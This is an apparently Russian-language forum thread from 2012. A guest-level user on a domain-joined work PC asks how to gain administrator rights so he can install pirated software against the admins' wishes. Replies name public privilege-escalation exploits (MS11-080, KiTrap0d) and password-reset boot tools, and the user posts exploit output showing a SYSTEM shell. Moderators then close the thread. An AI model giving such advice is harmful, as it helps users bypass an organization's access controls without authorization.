Сейчас на форуме: rmn, exp50848 (+8 невидимых)

 eXeL@B —› Основной форум —› Как взломать учетную запись администратора на WindowsXP SP3 или запустить процесс от Админа?
Посл.ответ Сообщение

Ранг: 6.9 (гость), 1thx
Активность: 0.030
Статус: Участник

Создано: 19 февраля 2012 17:44
· Личное сообщение · #1

Фокус с runas не прокатывает.Утилита для перебора паролей тоже ничего не находит.



Ранг: 56.1 (постоянный), 9thx
Активность: 0.040
Статус: Участник

Создано: 19 февраля 2012 17:50
· Личное сообщение · #2

например



Ранг: 6.9 (гость), 1thx
Активность: 0.030
Статус: Участник

Создано: 19 февраля 2012 18:00
· Личное сообщение · #3

vptrlx
Если можно,объясните как этой штукой пользоваться. Нужно установить Питона?




Ранг: 241.9 (наставник), 107thx
Активность: 0.140.01
Статус: Участник

Создано: 19 февраля 2012 18:06
· Личное сообщение · #4

Загрузись с загрузочного диска и сбрось пароль.
Windows Key Enterprice Edition гугли



Ранг: 6.9 (гость), 1thx
Активность: 0.030
Статус: Участник

Создано: 19 февраля 2012 18:11
· Личное сообщение · #5

Nightshade
BIOS тоже запаролен,а системник опечатан. Стандартные пароли не подходят,только если батарейку вытащить. Комп входит в домен,а у меня учетка с правами Гостя. Нужно установить несколько программ,а админы не хотят потому что это пиратское всё.



Ранг: 6.9 (гость), 1thx
Активность: 0.030
Статус: Участник

Создано: 19 февраля 2012 18:18 · Поправил: Calypso
· Личное сообщение · #6

Этот эксплоит http://www.exploit-db.com/wp-content/themes/exploit/screenshots/idlt18500/ms11-080-screenie.png не работает почему-то. Установил Питон, пишет
parser.print_help()
IndentationError: expected an indented block
Питона качал отсюда:
http://www.python.org/ftp/python/2.7.2/python-2.7.2.msi

Тренировочная ОС: Windows 2003 Server SP2 под админом

ps Уже разобрался,Питону нужны пробелы во вложенных циклах.Но всё равно не работает:
C:\>18176.py -O 2K3
[>] MS11-080 Privilege Escalation Exploit
[>] Matteo Memelli - ryujin@offsec.com
[>] Release Date 28/11/2011
[+] Retrieving Kernel info...
[+] Kernel version: ntkrnlpa.exe
[+] Kernel base address: 0x80800000L
[+] HalDispatchTable address: 0x80890070L
[+] Retrieving hal.dll info...
[+] hal.dll base address: 0x80a54000L
[+] HaliQuerySystemInformation address: 0x80a73a1eL
[+] HalpSetSystemInformation address: 0x80a75c60L
[*] Triggering AFDJoinLeaf pointer overwrite...
[*] Spawning a SYSTEM shell...
[*] Restoring token...
[+] Restore done! Have a nice day

C:\>whoami
win2003-calypso\администратор





Ранг: 241.9 (наставник), 107thx
Активность: 0.140.01
Статус: Участник

Создано: 19 февраля 2012 18:46 · Поправил: Nightshade
· Личное сообщение · #7

биос можно сбросить и програмно через командную строку. еще проще выйти из домена и попробовать зайти локально под админом. админы обычно ленивые и не ставят пароли на локальные учетки. Правда может стоять и запрет на локальный вход



Ранг: 6.9 (гость), 1thx
Активность: 0.030
Статус: Участник

Создано: 19 февраля 2012 18:51
· Личное сообщение · #8

Лучше всего повышение привилегий,чтобы не трогать системные настройки. Тогда вообще можно будет работать хочешь под админом,хочешь под гостем.
Nightshade пишет:
биос можно сбросить и програмно через командную строку

не работает
Nightshade пишет:
еще проще выйти из домена и попробовать зайти локально под админом

не входит,только через домен




Ранг: 241.9 (наставник), 107thx
Активность: 0.140.01
Статус: Участник

Создано: 19 февраля 2012 18:56
· Личное сообщение · #9

Если ты в домене и не можешь зайти локально, то тебе не помогут утилиты взлома паролей.



Ранг: 137.9 (ветеран), 45thx
Активность: 0.080
Статус: Участник

Создано: 19 февраля 2012 19:27
· Личное сообщение · #10

Calypso
--> kitrap0d<--



Ранг: 6.9 (гость), 1thx
Активность: 0.030
Статус: Участник

Создано: 19 февраля 2012 19:49
· Личное сообщение · #11

yanus0
Что то он даже с правами админа не работает:
--------------------------------------------------
Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit
-------------------------------------------- taviso@sdf.lonestar.org ---


[+] Spawning a shell to give SYSTEM token (do not close it)
[!] CreateProcess("C:\WINDOWS\SYSTEM32\CMD.EXE") returned failure, 0xc1
[!] PrepareProcessForSystemToken() returned failure
[+] Press any key to exit...




Ранг: 512.7 (!), 360thx
Активность: 0.270.03
Статус: Модератор

Создано: 19 февраля 2012 20:11
· Личное сообщение · #12

Calypso
CD/USB/FDD reset disk мож поможет?

http://pogostick.net/~pnh/ntpasswd/



Ранг: 189.9 (ветеран), 334thx
Активность: 0.30
Статус: Участник

Создано: 19 февраля 2012 21:20
· Личное сообщение · #13

А при чём тут этот форум!? Да ещё и в основной ветке?




Ранг: 2014.5 (!!!!), 1278thx
Активность: 1.340.25
Статус: Модератор
retired

Создано: 19 февраля 2012 22:02
· Личное сообщение · #14

Недобаненые возвращаются. Исправлено.


 eXeL@B —› Основной форум —› Как взломать учетную запись администратора на WindowsXP SP3 или запустить процесс от Админа?
Эта тема закрыта. Ответы больше не принимаются.
   Для печати Для печати